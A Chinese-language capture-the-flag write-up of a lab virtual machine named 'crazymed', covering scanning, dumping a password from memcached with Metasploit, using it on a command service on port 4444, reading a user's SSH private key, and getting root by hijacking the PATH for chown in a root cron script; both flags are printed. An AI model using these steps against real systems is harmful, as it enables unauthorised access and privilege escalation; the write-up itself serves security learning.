信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn  192.168.122.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 07:25 EDT
Nmap scan report for 192.168.122.168
Host is up (0.00028s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp    open  http      Apache httpd 2.4.54 ((Debian))
4444/tcp  open  krb524?
11211/tcp open  memcached Memcached 1.6.9 (uptime 491 seconds)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.94SVN%I=7%D=5/10%Time=663E0427%P=x86_64-pc-linux-gnu%r
SF:(NULL,2C3,"\x1b\[H\x1b\[2J\x1b\[3J\x1b\[1;97mW\x1b\[0m\x1b\[1;97me\x1b\
SF:[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;
SF:97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mt\x1b
SF:\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mt\x1b\[0m\x1b
SF:\[1;97mh\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mC
SF:\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97ma\x1b\[0m\x1b\[1;97mz\x1b\[0m\x1
SF:b\[1;97my\x1b\[0m\x1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97md\x
SF:1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x
SF:1b\[1;97md\x1b\[0m\x1b\[1;97mi\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97ma\
SF:x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mr\x1b\[0m\
SF:x1b\[1;97me\x1b\[0m\x1b\[1;97ms\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97ma
SF:\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97mh\x1b\[0m\x1
SF:b\[1;97m\x20\x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97ma\x1b\[0m\x1b\[1;97m
SF:b\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97ma\x1b\[0m\x
SF:1b\[1;97mt\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97my\
SF:x1b\[0m\x1b\[1;97m\.\x1b\[0m\nAll\x20our\x20tests\x20are\x20performed\x
SF:20on\x20human\x20volunteers\x20for\x20a\x20fee\.\n\n\nPassword:\x20")%r
SF:(GetRequest,30D,"\x1b\[H\x1b\[2J\x1b\[3J\x1b\[1;97mW\x1b\[0m\x1b\[1;97m
SF:e\x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97mo\x1b\[0m\x
SF:1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97
SF:mt\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mt\x1b\[
SF:0m\x1b\[1;97mh\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[
SF:1;97mC\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97ma\x1b\[0m\x1b\[1;97mz\x1b\
SF:[0m\x1b\[1;97my\x1b\[0m\x1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;
SF:97md\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mm\x1b\[0m\x1b\[1;97me\x1b
SF:\[0m\x1b\[1;97md\x1b\[0m\x1b\[1;97mi\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1
SF:;97ma\x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97mr\x1
SF:b\[0m\x1b\[1;97me\x1b\[0m\x1b\[1;97ms\x1b\[0m\x1b\[1;97me\x1b\[0m\x1b\[
SF:1;97ma\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97mc\x1b\[0m\x1b\[1;97mh\x1b\
SF:[0m\x1b\[1;97m\x20\x1b\[0m\x1b\[1;97ml\x1b\[0m\x1b\[1;97ma\x1b\[0m\x1b\
SF:[1;97mb\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1;97ma\x1b
SF:\[0m\x1b\[1;97mt\x1b\[0m\x1b\[1;97mo\x1b\[0m\x1b\[1;97mr\x1b\[0m\x1b\[1
SF:;97my\x1b\[0m\x1b\[1;97m\.\x1b\[0m\nAll\x20our\x20tests\x20are\x20perfo
SF:rmed\x20on\x20human\x20volunteers\x20for\x20a\x20fee\.\n\n\nPassword:\x
SF:20\x1b\[1;31mAccess\x20denied\.\x1b\[0m\n\nPassword:\x20\x1b\[1;31mAcce
SF:ss\x20denied\.\x1b\[0m\n\nPassword:\x20");
MAC Address: 08:00:27:8C:1C:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.36 seconds

路径扫描

payload:

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 100 -b 403,404 -x php,*  -u http://192.168.122.168        
/assets               (Status: 301) [Size: 319] [--> http://192.168.122.168/assets/]
/forms                (Status: 301) [Size: 318] [--> http://192.168.122.168/forms/]
/manual               (Status: 301) [Size: 319] [--> http://192.168.122.168/manual/]

并没有发现有什么奇怪的东西

于是我们分别nc访问端口,看有什么东西

  1. 11211/tcp open memcached Memcached 1.6.9 (uptime 491 seconds)
通过师傅的wp发现可以利用msf
msfconsole
msf6 > search gather/memcached_extractor
show options
set rhost 192.168.122.168
run
[+] 192.168.122.168:11211 - memcached loot stored at /root/.msf4/loot/20240510110229_default_192.168.122.168_memcached.dump_353967.txt
[*] 192.168.122.168:11211 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

password:

打开文件发现密码

{"conf_location"=>"VALUE conf_location 0 21\r\n/etc/memecacched.conf\r\nEND\r\n", "log"=>"VALUE log 0 18\r\npassword: cr4zyM3d\r\nEND\r\n", "server"=>"VALUE server 0 9\r\n127.0.0.1\r\nEND\r\n", "domain"=>"VALUE domain 0 8\r\ncrazymed\r\nEND\r\n"}         

通过4444/tcp open krb524?,发现可以执行命令Kerberos身份验证流程及Kerberos流量解密 - zpchcbd - 博客园 (cnblogs.com)

Kerberos 是一种由 MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。

nc 192.168.122.168 4444
Password: cr4zyM3d
Access granted.
Type "?" for help.
System command: 
(echo `command`)=system可以执行系统命令

System command: echo `ls -al`
total 36 drwxr-xr-x 4 brad brad 4096 May 10 17:11 . drwxr-xr-x 3 root root 4096 Oct 31 2022 .. lrwxrwxrwx 1 root root 9 May 10 17:11 .bash_history -> /dev/null -rw-r--r-- 1 brad brad 220 Oct 26 2022 .bash_logout -rw-r--r-- 1 brad brad 3526 Oct 31 2022 .bashrc drwxr-xr-x 3 brad brad 4096 Nov 1 2022 .local -rw-r--r-- 1 brad brad 807 Oct 26 2022 .profile drwx------ 2 brad brad 4096 Oct 29 2022 .ssh -rwx------ 1 brad brad 33 Oct 31 2022 user.txt -rw-r--r-- 1 brad brad 165 Oct 31 2022 .wget-hsts
System command: echo `cat .ssh`
发现存在.ssh,尝试利用登录
echo `cat .ssh/id_rsa`
复制粘贴,成功登陆

获取shell

通过获取的id_rsa成功拿到shell

user.txt:f70a9801673220fb56f42cf9d5ddc28b

提权

通过pspy64脚本发现一个定时文件

brad@crazymed:/opt$ cat check_VM
#! /bin/bash

#users flags
flags=(/root/root.txt /home/brad/user.txt)
for x in "${flags[@]}"
do
if [[ ! -f $x ]] ; then
echo "$x doesn't exist"
mcookie > $x
chmod 700 $x
fi
done
chown -R www-data:www-data /var/www/html
#bash_history => /dev/null
home=$(cat /etc/passwd |grep bash |awk -F: '{print $6}')
for x in $home
do
ln -sf /dev/null $x/.bash_history ; eccho "All's fine !"
done
find /var/log -name "*.log*" -exec rm -f {} +

于是我们通过路径劫持,因为我们覅先chown无限制,我们可以伪造一个chown然后伪造到/bin/bash前面的路径,直接提权

brad@crazymed:/tmp$ echo "chmod u+s /bin/bash" > /usr/local/bin/chown
brad@crazymed:/tmp$ chmod +x /usr/local/bin/chown
brad@crazymed:/tmp$ /bin/bash -p

成功提权

bash-5.1# id
uid=1000(brad) gid=1000(brad) euid=0(root) groups=1000(brad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
root.txt
bash-5.1# cat root.txt
b9b38d9533ca00072eff46338bf21b43

知识点

  1. 4444/tcp open krb524? 用户验证协议
  2. 11211/tcp open memcached Memcached 1.6.9 (uptime 491 seconds) 缓存服务器的命令使用
  3. 路径劫持(很经典了,好几次用到)
  4. nc 访问段端口的使用